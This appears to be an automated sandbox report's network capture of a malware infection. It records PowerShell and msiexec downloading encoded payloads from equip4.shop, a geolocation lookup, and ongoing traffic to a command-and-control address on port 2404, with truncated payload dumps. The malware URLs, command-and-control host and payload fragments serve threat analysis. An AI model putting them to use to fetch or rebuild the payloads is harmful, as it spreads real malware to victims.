                                                                                                        Oct 10, 2024 08:58:03.996470928 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996505976 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996540070 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996640921 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:03.996665001 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996714115 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996747017 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996768951 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:03.996778965 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996812105 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996835947 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:03.996860027 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996891975 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996913910 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:03.996925116 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996957064 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.996973991 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:03.997004986 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.997040033 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.997055054 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:03.997071981 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.997103930 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.997121096 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:03.997136116 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.997169018 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.997190952 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:03.997200012 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.997231960 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.997247934 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:03.997266054 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:03.997317076 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:04.005139112 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:04.059060097 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:04.059082985 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:04.059098959 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:04.059113026 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:04.059127092 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:04.059140921 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:04.059169054 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:04.059206009 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:04.059294939 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:06.878787041 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:06.883768082 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.883789062 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.883800983 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.883812904 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.883826017 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:06.883831978 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.883861065 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:06.883919001 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.883968115 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.883980036 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.883991957 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.884082079 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.888761997 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.888775110 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.888794899 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.888807058 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.888833046 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.888855934 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.888904095 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.943815947 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:06.949440002 CEST240449739154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:06.949563026 CEST497392404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:20.329554081 CEST240449738154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:20.331979036 CEST497382404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:20.337061882 CEST240449738154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:50.344675064 CEST240449738154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:58:50.346175909 CEST497382404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:58:50.351037025 CEST240449738154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:59:20.346959114 CEST240449738154.216.18.214192.168.2.4
                                                                                                        Oct 10, 2024 08:59:20.349082947 CEST497382404192.168.2.4154.216.18.214
                                                                                                        Oct 10, 2024 08:59:20.354346037 CEST240449738154.216.18.214192.168.2.4
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 10, 2024 08:57:25.497812986 CEST5639253192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 08:57:25.511698961 CEST53563921.1.1.1192.168.2.4
                                                                                                        Oct 10, 2024 08:58:02.102988958 CEST4934453192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 08:58:02.111712933 CEST53493441.1.1.1192.168.2.4
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Oct 10, 2024 08:57:25.497812986 CEST192.168.2.41.1.1.10x3848Standard query (0)equip4.shopA (IP address)IN (0x0001)false
                                                                                                        Oct 10, 2024 08:58:02.102988958 CEST192.168.2.41.1.1.10x1d8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Oct 10, 2024 08:57:25.511698961 CEST1.1.1.1192.168.2.40x3848No error (0)equip4.shop104.21.56.207A (IP address)IN (0x0001)false
                                                                                                        Oct 10, 2024 08:57:25.511698961 CEST1.1.1.1192.168.2.40x3848No error (0)equip4.shop172.67.136.173A (IP address)IN (0x0001)false
                                                                                                        Oct 10, 2024 08:58:02.111712933 CEST1.1.1.1192.168.2.40x1d8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                        • equip4.shop
                                                                                                        • geoplugin.net
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.449730104.21.56.207804948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 08:57:25.522253036 CEST173OUTGET /FvMVdpFg/Atols.rar HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                        Host: equip4.shop
                                                                                                        Connection: Keep-Alive
                                                                                                        Oct 10, 2024 08:57:26.230530977 CEST1236INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 10 Oct 2024 06:57:26 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: max-age=14400
                                                                                                        CF-Cache-Status: EXPIRED
                                                                                                        Last-Modified: Thu, 10 Oct 2024 06:57:26 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHdd6TXSXU72xi7s6wRrQwGuFyfzv58%2F82creYP9vKhwYOld7th%2BFzLVKvB0Hyc6TSdODxjWdtIsXHTKS55t0M8iwOwy4FZHyBTyXa17sigSxS%2BiPvSoBysYlT62SQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d04b7591bda0f8b-EWR
                                                                                                        alt-svc: h2=":443"; ma=60
                                                                                                        Data Raw: 33 38 63 36 0d 0a 63 51 47 62 36 77 49 2f 4c 37 75 44 42 51 34 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 48 45 42 6d 33 45 42 6d 37 6e 63 35 32 2b 42 36 77 4c 70 5a 65 73 43 58 67 53 42 77 52 55 6f 38 79 6a 72 41 75 75 4a 36 77 4c 43 31 59 48 70 38 51 39 6a 71 6e 45 42 6d 33 45 42 6d 2b 73 43 64 42 6c 78 41 5a 75 36 4e 53 70 67 69 48 45 42 6d 33 45 42 6d 33 45 42 6d 33 45 42 6d 7a 48 4b 36 77 49 53 57 33 45 42 6d 34 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 36 77 4a 32 4f 75 73 43 61 54 4f 44 77 51 54 72 41 70 4b 72 63 51 47 62 67 66 6b 39 6e 5a 51 41 66 4d 7a 72 41 6d 59 2f 36 77 49 53 4d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 33 45 42 6d 34 48 44 57 4f 6c 4f 41 4f 73 43 57 36 76 72 41 76 6c 4b 75 73 41 75 4d 67 37 72 41 75 61 31 36 77 49 63 55 49 48 79 65 2f 4b 69 57 2b 73 43 67 56 54 72 41 6e 54 43 67 63 4a 46 49 32 2b 71 36 77 4a 34 31 65 73 43 5a 77 68 78 41 5a 76 72 41 6f 61 64 36 77 4c 55 79 2b 73 43 67 32 75 4c 44 42 42 78 41 5a 74 78 41 5a 75 4a 44 42 4e 78 41 5a 74 78 [TRUNCATED]
                                                                                                        Data Ascii: 38c6cQGb6wI/L7uDBQ4AcQGbcQGbA1wkBHEBm3EBm7nc52+B6wLpZesCXgSBwRUo8yjrAuuJ6wLC1YHp8Q9jqnEBm3EBm+sCdBlxAZu6NSpgiHEBm3EBm3EBm3EBmzHK6wISW3EBm4kUC3EBm3EBm9Hi6wJ2OusCaTODwQTrApKrcQGbgfk9nZQAfMzrAmY/6wISM4tEJARxAZtxAZuJw3EBm3EBm4HDWOlOAOsCW6vrAvlKusAuMg7rAua16wIcUIHye/KiW+sCgVTrAnTCgcJFI2+q6wJ41esCZwhxAZvrAoad6wLUy+sCg2uLDBBxAZtxAZuJDBNxAZtxAZtC6wL0MHEBm4H6PA0FAHXW6wJ/OOsCZ5+JXCQM6wLIZesCGxyB7QADAABxAZvrArQ2i1QkCOsCeW/rAl1Vi3wkBHEBm+sCOQ2J63EBm+sChtOBw5wAAADrAq1hcQGbU+sC5HvrAulVakBxAZtxAZuJ6+sCqYBxAZvHgwABAAAAsKUAcQGbcQGbgcMAAQAAcQGb6wJmKVNxAZtxAZuJ63EBm+sC0iSJuwQBAABxAZtxAZuBwwQBAADr
                                                                                                        Oct 10, 2024 08:57:26.230581999 CEST1236INData Raw: 41 75 4e 55 63 51 47 62 55 33 45 42 6d 2b 73 43 77 52 4a 71 2f 2b 73 43 39 6e 50 72 41 6a 77 2b 67 38 49 46 36 77 4a 30 58 75 73 43 58 54 77 78 39 6e 45 42 6d 2b 73 43 6a 2f 4d 78 79 65 73 43 33 37 4e 78 41 5a 75 4c 47 75 73 43 52 4e 4e 78 41 5a
                                                                                                        Data Ascii: AuNUcQGbU3EBm+sCwRJq/+sC9nPrAjw+g8IF6wJ0XusCXTwx9nEBm+sCj/MxyesC37NxAZuLGusCRNNxAZtBcQGb6wIVOzkcCnXzcQGb6wICrEbrAhDvcQGbgHwK+7h13esCxJ7rAvNMi0QK/HEBm+sC/Zwp8OsCPHzrAgEz/9LrAvYMcQGbujwNBQBxAZtxAZsxwOsCr4LrApAvi3wkDHEBm3EBm4E0B6/m+LPrAoHzcQGbg8A
                                                                                                        Oct 10, 2024 08:57:26.230617046 CEST1236INData Raw: 77 6b 50 6a 41 5a 6d 65 36 43 53 72 34 41 6c 79 34 6e 4e 61 59 7a 30 4d 69 79 4b 72 54 58 51 36 6d 2b 4a 54 52 65 5a 68 70 63 78 2b 73 5a 33 32 43 79 74 4d 72 4b 31 59 4d 59 66 2b 4b 45 76 6b 75 78 42 42 62 65 4c 34 4f 69 70 2b 2b 4c 4f 76 74 55
                                                                                                        Data Ascii: wkPjAZme6CSr4Aly4nNaYz0MiyKrTXQ6m+JTReZhpcx+sZ32CytMrK1YMYf+KEvkuxBBbeL4Oip++LOvtUNF7sjNMlzgrus4ZwtDuZBa4jNvGbq2e56KaJDXdXLqzVlD+siudD8wpVOA7PIPhnhbDvVWNv2iCqJGvw4WK1NnigvQrn8rlAEb4FNpApY/oTd8vaoJ3y0V2y4UQgzgTXlBDNc0Gi4MkffBjK4vJgDxpTKAfXHQ4ML
                                                                                                        Oct 10, 2024 08:57:26.230649948 CEST1236INData Raw: 49 6c 77 34 34 73 61 38 39 37 4a 72 44 66 69 7a 72 2b 62 34 73 36 2f 6d 2b 4c 4f 76 35 76 69 7a 72 2b 62 34 73 36 2f 6d 2b 4c 4f 76 35 76 69 7a 72 78 61 45 4c 6a 34 72 55 56 57 69 6c 30 76 77 52 37 4a 48 74 36 39 76 66 66 4f 75 35 76 69 38 72 7a
                                                                                                        Data Ascii: Ilw44sa897JrDfizr+b4s6/m+LOv5vizr+b4s6/m+LOv5vizrxaELj4rUVWil0vwR7JHt69vffOu5vi8rznRs6/m+LOv5vizr+b4s6/m+LOv5vizr+b4s6/mDfwL6ZGtA7h4wzjVRo6efDQjfF1YKzThS2rp4iIVsHrtceytvWad5lv5voY7fegRU6oep6RAYbU1eG/DDn/XkbU2fB7ARz0vNU3FZKZZWe0XGmq/+6/iGia/TQw
                                                                                                        Oct 10, 2024 08:57:26.230686903 CEST1236INData Raw: 6d 69 59 58 4e 42 64 49 6c 76 4e 4a 57 74 54 67 31 54 31 74 6d 69 56 4e 32 32 75 56 4b 59 47 6e 6b 6a 48 46 70 35 6a 6f 6f 49 72 71 30 52 64 49 38 55 63 2b 58 47 71 4e 6b 6c 38 4a 64 32 39 74 4f 71 37 6d 2b 41 6c 73 68 4d 41 6e 4c 68 54 67 64 6d
                                                                                                        Data Ascii: miYXNBdIlvNJWtTg1T1tmiVN22uVKYGnkjHFp5jooIrq0RdI8Uc+XGqNkl8Jd29tOq7m+AlshMAnLhTgdmKbqgkJmYRgLiRf7lsZeVlet1uoLhSfKufjeUGU9X0B/HpxUKb1ZTZgk9CiuJRBVBqa7lbTgIOkTGhW16I7CsB27TbJlic+pEWjhevWsDYHhUBtXjcB1u/F3jDoWSP26S4Mtwpu1XlxOfc0+v3p/lHs5vizr+b4s6/
                                                                                                        Oct 10, 2024 08:57:26.230720997 CEST1236INData Raw: 42 73 2f 30 7a 49 4f 6c 65 6d 58 31 2f 53 37 4e 69 41 68 59 56 54 52 65 52 7a 55 64 41 56 57 55 68 6f 4a 78 2f 37 6b 66 6c 41 74 76 36 75 33 4c 79 6a 67 79 47 66 6d 7a 72 2b 6e 35 65 72 2f 6d 2b 4c 4f 76 35 76 69 7a 72 2b 62 34 73 36 2f 6d 2b 4c
                                                                                                        Data Ascii: Bs/0zIOlemX1/S7NiAhYVTReRzUdAVWUhoJx/7kflAtv6u3LyjgyGfmzr+n5er/m+LOv5vizr+b4s6/m+LOv5vizr+b4s6/m+LNCmuPMaA68IqoiP0gEm1chtH65Y0u5NpTH1sYZPbFHso+0VzJA/D3CZ2cPLz5/FDJoBsB0e2c/FlNY2OAzbxuylHueileX8Jpsj9Ov7h1v7fYVFQrTV+P9KA598cs90edqTL6KUf/2Lg6AfWD
                                                                                                        Oct 10, 2024 08:57:26.230755091 CEST1236INData Raw: 4c 65 4b 45 44 65 44 41 67 4f 52 57 33 50 43 5a 6c 47 57 37 76 6a 4d 59 65 56 66 47 42 37 75 61 72 41 56 34 52 78 46 65 76 71 41 58 66 46 2f 31 59 6a 72 72 4c 68 42 50 77 31 78 56 39 34 4e 62 58 76 69 7a 72 2b 62 34 73 36 2f 6d 2b 4c 4f 76 35 76
                                                                                                        Data Ascii: LeKEDeDAgORW3PCZlGW7vjMYeVfGB7uarAV4RxFevqAXfF/1YjrrLhBPw1xV94NbXvizr+b4s6/m+LOv5vizr+b4s6/m+LOv5vizrxi/J+AheUVyW0weY20R9Md5acOTDcKgdG+cU/LUCcnzVN9fxCJkiSF2B0Rv88yeFMoBqhmGumsFKpK1V4Utv+Vjj5doJlFqVXViy7gOtqG1vTGp1cya+kWxV3g0JUAA5rJQOqAfFYRkZxb
                                                                                                        Oct 10, 2024 08:57:26.230787039 CEST1000INData Raw: 37 62 37 57 48 41 44 43 51 36 63 37 6e 61 4b 61 64 74 34 69 6c 39 4a 38 2f 62 33 38 45 6f 4b 76 77 76 39 58 56 5a 57 37 49 66 56 76 38 79 70 4a 68 69 46 7a 4e 74 4c 6e 2b 4c 50 2b 58 77 31 36 52 78 35 35 57 6e 52 77 5a 33 73 75 46 78 75 61 35 74
                                                                                                        Data Ascii: 7b7WHADCQ6c7naKadt4il9J8/b38EoKvwv9XVZW7IfVv8ypJhiFzNtLn+LP+Xw16Rx55WnRwZ3suFxua5tZxoiPAqE9WXwtwdkPoXEKP639Tax5i63Am7RbItI3cE7YlZEuHxSfVHpKNdX0hKL+uDcaqMRMuEGhYjnR5dbXb4H4m+NeUrk15VBmPHiP/tSxzzLL4mVQ2ZqKAtg6ie199Q3IhRIEwkkXb1mmm28inbdUuytzOTrb
                                                                                                        Oct 10, 2024 08:57:26.230819941 CEST1236INData Raw: 6b 4c 47 5a 66 6e 6f 79 6d 38 4c 52 4b 50 44 51 65 62 65 4c 44 58 4d 66 39 57 66 55 6c 37 6e 66 6a 4c 7a 2f 73 45 5a 70 6e 4b 50 6a 4d 6d 6b 74 77 64 74 5a 5a 77 34 77 70 6f 51 44 4d 6b 48 58 35 6e 78 46 62 2f 62 48 71 58 67 35 77 4f 6c 67 64 47
                                                                                                        Data Ascii: kLGZfnoym8LRKPDQebeLDXMf9WfUl7nfjLz/sEZpnKPjMmktwdtZZw4wpoQDMkHX5nxFb/bHqXg5wOlgdGLvoCxTZePtaWyiJsMhtmXR32v0mUdx/kYkF3bGZa+XDqYaY688a0DtJluWsa/mNOl+B1kwy/VCZVJdgJbJ5/Z85o0iRzlzxnpJlnbFLRLUZXQ1wYa3rp0bxTzepRBM7I0aZz8mE8nmMliJzbIFZz8ctHV+vGjXRrO
                                                                                                        Oct 10, 2024 08:57:26.230856895 CEST1236INData Raw: 35 76 69 7a 72 2b 59 4d 45 32 70 41 49 71 50 4e 44 64 51 2b 6e 4f 4e 66 2b 6c 64 76 54 56 61 75 35 76 69 38 72 69 2f 57 73 36 2f 6d 2b 4c 4f 76 35 76 69 7a 72 2b 62 34 73 36 2f 6d 2b 4c 4f 76 35 76 69 7a 72 2b 62 34 73 36 2f 6d 43 57 69 39 45 55
                                                                                                        Data Ascii: 5vizr+YME2pAIqPNDdQ+nONf+ldvTVau5vi8ri/Ws6/m+LOv5vizr+b4s6/m+LOv5vizr+b4s6/mCWi9EUxHhXgqCQBNcU35tEJdJ1DDMl1EPr4eZxLlBGdiMl04YnibZxJHwxc8OrVJerMDPqi77ZTC08c4/G6Omd4CfhIz0cTDUz+mrQtDpIlK50bTCA71bU1Wrub4Ojr7+rOvsEZmJGwHMkG0bGWRZw5PjkEcMlkbd5AcZxY
                                                                                                        Oct 10, 2024 08:57:26.235780001 CEST1236INData Raw: 66 4c 36 51 4f 71 53 42 49 50 36 4a 66 51 31 67 31 36 77 62 4e 38 73 4f 4d 77 47 55 51 67 58 4c 6b 44 33 78 46 56 2f 53 62 6d 36 7a 4f 42 64 68 79 2b 68 69 31 5a 59 74 70 6a 64 5a 76 48 6c 59 48 31 70 4a 77 6d 50 4e 56 71 67 63 38 49 6c 55 59 55
                                                                                                        Data Ascii: fL6QOqSBIP6JfQ1g16wbN8sOMwGUQgXLkD3xFV/Sbm6zOBdhy+hi1ZYtpjdZvHlYH1pJwmPNVqgc8IlUYUXbxMEe30UXGvpi1Kot26XQ4xZ7021J/G1lga3m+Lyu9aWzr+b4s6/m+LOv5vizr+b4s6/m+LOv5vizr+YK+phROpEuTebVoCHIs6/m+LOv5vizr+b4s6/m+LOv5vizr+b4s6/mEaMSZ5Vjdl6XfjQwmeYNJpgCHdG


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.449737104.21.56.207803808C:\Windows\SysWOW64\msiexec.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 08:57:58.508688927 CEST187OUTGET /OaDlaEkr/ZMtPPuAqIIoCDAp111.bin HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                        Host: equip4.shop
                                                                                                        Cache-Control: no-cache
                                                                                                        Oct 10, 2024 08:57:59.210412025 CEST1236INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 10 Oct 2024 06:57:59 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: max-age=14400
                                                                                                        CF-Cache-Status: EXPIRED
                                                                                                        Last-Modified: Thu, 10 Oct 2024 06:57:59 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BH%2FnhYNs3ia4Q%2BjOuEfmtM%2B8zP7RPhNY5ATVRNuRn7qA3QMTZ%2Fbmu2HkTuhsFRh9RHwL9ainzysvHvJBkXfCJKjqaPmHD2zbVQGsS1C4N%2BcfwNrh7Rwm0J4f6%2Bm%2FhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d04b8273f260c80-EWR
                                                                                                        alt-svc: h2=":443"; ma=60
                                                                                                        Data Raw: 33 38 63 64 0d 0a 1b d6 7c f4 2e 31 45 cc 5e d7 58 b1 6a df 4e 2b 5a 0a f0 85 70 50 7c 5b cc 3c 02 be 07 5f bc 15 ed 29 31 07 24 b7 72 52 e2 20 19 0f 41 78 46 a8 3f 49 82 ab c9 23 90 2a 2d 95 f9 87 de 6a 65 bc f7 d2 60 66 08 17 0a c9 21 03 74 a9 dc 6f e0 c0 b1 85 37 76 07 01 8c 9a 7c 66 f9 24 49 2e 02 b6 6c 99 ed 0c 90 d4 32 5c 11 0c 04 8b 9c 05 2b d9 ad a2 fa ad 4d 12 a4 c5 66 a4 ad e3 84 4b ed 77 0d f6 04 01 2c 14 0f 38 10 87 05 68 58 52 d1 46 f9 ac 40 d7 0e 6b 38 60 a8 35 21 f9 43 7f ad 77 d4 c5 62 8a d1 72 39 f5 02 44 98 62 0d d2 c8 84 13 ba 7d 06 df bd 24 66 6a 99 ca 79 38 6d cb 06 a0 17 fe ac 91 0d 08 5a 20 88 62 80 27 7d 16 d4 59 ea a1 64 3b d3 7f e9 1e 82 ba 30 1f bd e9 1b 38 83 b3 6c 6e d3 f3 19 57 6f 60 78 59 be 30 e8 9b 98 4f cd 60 48 f1 3a d2 80 ab c4 3c 92 7c a9 7a f8 0d 81 b0 11 1b 82 d9 5b f1 87 ff ff 17 57 08 83 12 79 7b ce aa 83 46 7a e6 52 2b 95 87 84 c0 3f 7e f4 46 4c a0 0e 49 13 b1 2f 5b ec 39 f8 2b 6c 54 c6 90 01 1a 81 35 44 d2 be 0d b4 0b cd 44 ee d0 23 22 04 9d 87 a9 a8 68 6d [TRUNCATED]
                                                                                                        Data Ascii: 38cd|.1E^XjN+ZpP|[<_)1$rR AxF?I#*-je`f!to7v|f$I.l2\+MfKw,8hXRF@k8`5!Cwbr9Db}$fjy8mZ b'}Yd;08lnWo`xY0O`H:<|z[Wy{FzR+?~FLI/[9+lT5DD#"hm"QElo:)M?o5trcZI[a+FO:D8WWTNqx;79z eV5icl~"zgYS^50A)7ija{0bXs$c52o_#V
                                                                                                        Oct 10, 2024 08:57:59.210511923 CEST1236INData Raw: db ee e2 ee 6b 87 2a b2 aa 3f 94 a2 fc 0a e4 cb d0 fc 22 ee 0c 65 a2 b1 3b 41 56 b9 5c 25 91 f9 48 7a 6c 18 d2 bd f7 eb 0f 2a d6 6e bc 0e 61 93 46 78 45 c2 76 21 2d 76 73 22 b4 84 0a bd 2a ba 6a 7f 2e 2a 52 bd 0e 8c 6e 8c 37 e0 2b f3 f5 1d 98 b8
                                                                                                        Data Ascii: k*?"e;AV\%Hzl*naFxEv!-vs"*j.*Rn7+$ 7 WDgS]%+b)PP!^+:`sXkiP^*$gopQM1L&k<=Q2KOqkXLvc(+)5M
                                                                                                        Oct 10, 2024 08:57:59.210546017 CEST448INData Raw: 54 41 fe bc d4 00 fe df 22 3a 6d 38 9c b8 c2 eb ec e4 b4 d6 76 05 9b 0f fc 68 5b e5 12 4b 7d f8 84 8b 19 0b 11 b9 e7 c6 60 2d 37 01 f5 dc 62 9b e1 d5 08 47 31 2e f4 35 a6 ee 9d 1d 0d 9b 6b 64 cc e5 e9 fc 18 10 99 df ca 5c aa 90 c6 74 e0 6f a6 9c
                                                                                                        Data Ascii: TA":m8vh[K}`-7bG1.5kd\to`@\BjL]10b~UDJU)7Egkj8KA&&jDtt/ufRsDtAaa3?f9lu\17m~Xy
                                                                                                        Oct 10, 2024 08:57:59.210563898 CEST1236INData Raw: cb 4e 37 9e 87 f0 6b 02 6d 06 42 95 a4 cd ca 05 2e 01 81 da ea 75 6c e2 f8 03 90 c0 6f b9 b4 c3 a7 74 cf 4d 77 6f a7 73 bd ca 61 66 e1 2d e6 fe 61 4f 76 de d1 5b 1b 2f 99 d5 ae 58 02 78 bd a1 fe 10 32 e2 f4 94 4e 34 05 b9 f8 62 67 3d 5c 93 63 74
                                                                                                        Data Ascii: N7kmB.ulotMwosaf-aOv[/Xx2N4bg=\ct]O9D$?*gM3WwMrzlyGvWJk>5]o?BmJy{\|:e%"C/~ jXm*?nf8)qb?Zx9q.
                                                                                                        Oct 10, 2024 08:57:59.210581064 CEST1236INData Raw: 6a d0 1c d9 2b 65 bb 51 90 3b d0 14 ab 7c bc c2 a1 eb c2 0e 1a 3c 80 d8 56 88 fe 1b 29 b7 18 f7 ab bc 94 95 a6 89 eb e5 fd 46 bb 3e d0 a5 0a b8 a1 2c 62 8a 84 ca 1f dd fc d9 60 99 19 40 72 bb 95 5b 23 5d 6c 44 73 f4 e8 4f 65 f3 c3 da ca 58 11 ac
                                                                                                        Data Ascii: j+eQ;|<V)F>,b`@r[#]lDsOeX~$~I"ta)A&w9rmCL/9CuT<h=L+pE&zcgXG_I8y]s/h*6#*_zmqd\Cpdxi@
                                                                                                        Oct 10, 2024 08:57:59.210598946 CEST1236INData Raw: e8 1f 53 52 6a f2 57 4d 2f 72 d6 43 6a e9 08 7a 86 1c 59 50 9f dc 1a 58 32 90 3e e9 16 b4 9d 50 f3 71 8c c5 4b bf e7 5f c9 70 03 46 b0 1b ee b9 1e 2a bc 80 62 24 a5 1e 0e 13 f1 2c 2b 06 b2 a7 59 d9 79 88 3c 6a c3 a9 24 86 cb 55 2c 75 a0 66 b0 c3
                                                                                                        Data Ascii: SRjWM/rCjzYPX2>PqK_pF*b$,+Yy<j$U,ufStu<N_ti>[DL%,)D}q{0EE~}-61Qc:5f;r=azaR?n]+ L/Xp(W*6qR,8;q(i,!
